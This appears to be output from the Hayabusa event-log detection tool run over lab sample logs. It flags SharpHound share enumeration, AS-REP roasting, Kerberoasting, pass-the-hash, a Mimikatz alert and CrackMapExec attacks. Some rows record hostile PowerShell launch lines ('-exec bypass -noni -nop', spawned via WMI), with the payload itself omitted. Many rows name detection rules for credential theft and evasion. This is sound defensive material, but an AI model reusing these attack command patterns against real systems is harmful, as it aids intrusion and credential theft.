0x62cbf9f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-27 23:59:50.629 +09:00,atacore01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x369f8ca7,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-27 23:59:54.886 +09:00,atanids01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x740075dc,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-28 00:00:05.147 
+09:00,exchange01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0xb1086cfb,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:00:05.466 +09:00,adfs01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x1f6f9930,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:00:06.878 +09:00,fs01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x26fd4ec6,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:00:07.557 +09:00,prtg-mon.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x204aa3a4,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:00:09.605 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x62cf99e,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:00:10.730 +09:00,atacore01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x369f96be,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:17.723 +09:00,fs02.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x3902ac4,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:17.762 +09:00,dhcp01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x5df84d08,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:17.790 +09:00,wsus01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x57d352ca,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:17.920 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x13fa915,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:18.001 +09:00,win10-02.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x87371f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:20.658 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:30.691 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:37.825 +09:00,fs02.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x3902ff1,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:37.866 +09:00,dhcp01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x5df8549a,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:37.904 +09:00,wsus01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x57d35acf,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:37.916 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x13faf39,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:37.917 +09:00,win10-02.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x873c5b,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:40.730 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:50.745 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:04:00.785 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:04:10.808 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-29 16:55:53.423 +09:00,DC-Server-1.labcorp.local,1102,high,Evas,Security Log Cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:56:26.433 +09:00,DC-Server-1.labcorp.local,4769,info,,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL | Svc: DC-SERVER-1$ | IP Addr: ::ffff:192.168.1.2 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:56:26.435 +09:00,DC-Server-1.labcorp.local,4672,info,,Admin Logon,User: Bob | LID: 0xc66373,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:56:26.436 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: Bob | Computer: | IP Addr: 192.168.1.2 | LID: 0xc66373,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:56:26.681 +09:00,DC-Server-1.labcorp.local,4769,info,,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL | Svc: DC-SERVER-1$ | IP Addr: ::ffff:192.168.1.2 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:56:26.683 +09:00,DC-Server-1.labcorp.local,4672,info,,Admin Logon,User: Bob | LID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:56:26.683 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: Bob | Computer: | IP Addr: 192.168.1.2 | LID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:56:26.869 +09:00,DC-Server-1.labcorp.local,4768,medium,CredAccess,Possible AS-REP Roasting,Possible AS-REP Roasting,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_AS-REP-Roasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:56:26.869 +09:00,DC-Server-1.labcorp.local,4768,info,,Kerberos TGT Requested,User: Alice | Svc: krbtgt | IP Addr: ::ffff:192.168.1.2 | Status: 0x0 | PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:56:26.980 +09:00,DC-Server-1.labcorp.local,4634,info,,Logoff,User: Bob | LID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:58:02.652 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer: | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc712f1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:58:02.666 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer: | IP Addr: 192.168.1.100 | LID: 0xc7142b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:58:02.761 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer: | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc714d9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:58:28.422 +09:00,DC-Server-1.labcorp.local,4769,info,,Kerberos Service Ticket Requested,User: DC-SERVER-1$@LABCORP.LOCAL | Svc: DC-SERVER-1$ | IP Addr: ::1 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:58:28.425 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer: | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc7313f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:59:42.537 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer: | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc7adb8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:59:42.545 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer: | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc7ae25,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 18:23:54.244 +09:00,DC-Server-1.labcorp.local,1102,high,Evas,Security Log Cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
2021-04-29 18:23:58.690 +09:00,DC-Server-1.labcorp.local,4776,info,,NTLM Logon To Local Account,User: Alice | Computer: | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
2021-04-29 18:23:58.691 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: Alice | Computer: | IP Addr: 192.168.1.200 | LID: 0x27d676,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
2021-04-29 18:23:58.691 +09:00,DC-Server-1.labcorp.local,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
2021-04-29 18:23:58.718 +09:00,DC-Server-1.labcorp.local,4768,medium,CredAccess,Possible Kerberoasting,Possible Kerberoasting Risk Activity.,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_Kerberoasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
2021-04-29 18:23:58.718 +09:00,DC-Server-1.labcorp.local,4768,info,,Kerberos TGT Requested,User: Alice | Svc: krbtgt | IP Addr: ::ffff:192.168.1.200 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
2021-04-29 18:23:58.726 +09:00,DC-Server-1.labcorp.local,4769,info,,Kerberos Service Ticket Requested,User: Alice@LABCORP.LOCAL | Svc: sql101 | IP Addr: ::ffff:192.168.1.200 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets 
Kerberoasting/Security.evtx
2021-04-29 18:23:58.735 +09:00,DC-Server-1.labcorp.local,4634,info,,Logoff,User: Alice | LID: 0x27d676,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C [obfuscated PowerShell payload omitted] | Process: C:\Windows\System32\cmd.exe | User: OFFSEC\admmig | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x36df3b7 | PID: 7728 | PGUID: 9828DA72-683B-608C-A30C-000000000C00 | Hash: SHA1=F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D,MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,high,Exec,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,high,Exec | Evas,CrackMapExec PowerShell Obfuscation,,rules/sigma/process_creation/proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,medium,Exec,Change PowerShell Policies to an Unsecure Level,,rules/sigma/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: powershell.exe -exec bypass -noni -nop -w 1 -C [obfuscated PowerShell payload omitted] | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: OFFSEC\admmig | Parent Cmd: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C [obfuscated PowerShell payload omitted] | LID: 0x36df3b7 | PID: 4436 | PGUID: 9828DA72-683B-608C-A50C-000000000C00 | Hash: SHA1=F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054,MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,medium,Evas | Exec,Encoded PowerShell Command Line,,rules/sigma/process_creation/proc_creation_win_powershell_cmdline_specific_comb_methods.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,high,Exec | Evas,CrackMapExec PowerShell Obfuscation,,rules/sigma/process_creation/proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,medium,Exec,Change PowerShell Policies to an Unsecure Level,,rules/sigma/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload 
execution.evtx
2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,high,Exec,Suspicious PowerShell Parameter Substring,,rules/sigma/process_creation/proc_creation_win_powershell_suspicious_parameter_variation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,medium,Evas,Suspicious XOR Encoded PowerShell Command Line,,rules/sigma/process_creation/proc_creation_win_powershell_xor_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx
2021-05-01 05:32:56.725 +09:00,win10-02.offsec.lan,4103,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx
2021-05-01 05:32:56.725 +09:00,win10-02.offsec.lan,4103,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx
2021-05-03 17:16:43.008 +09:00,rootdc1.offsec.lan,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4661-SAM sensitive domain users & groups discovery.evtx
2021-05-03 17:16:43.017 +09:00,rootdc1.offsec.lan,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4661-SAM sensitive domain users & groups discovery.evtx
2021-05-03 17:58:25.921 +09:00,atanids01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x88f313a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:25.942 +09:00,atanids01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x88f3141d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
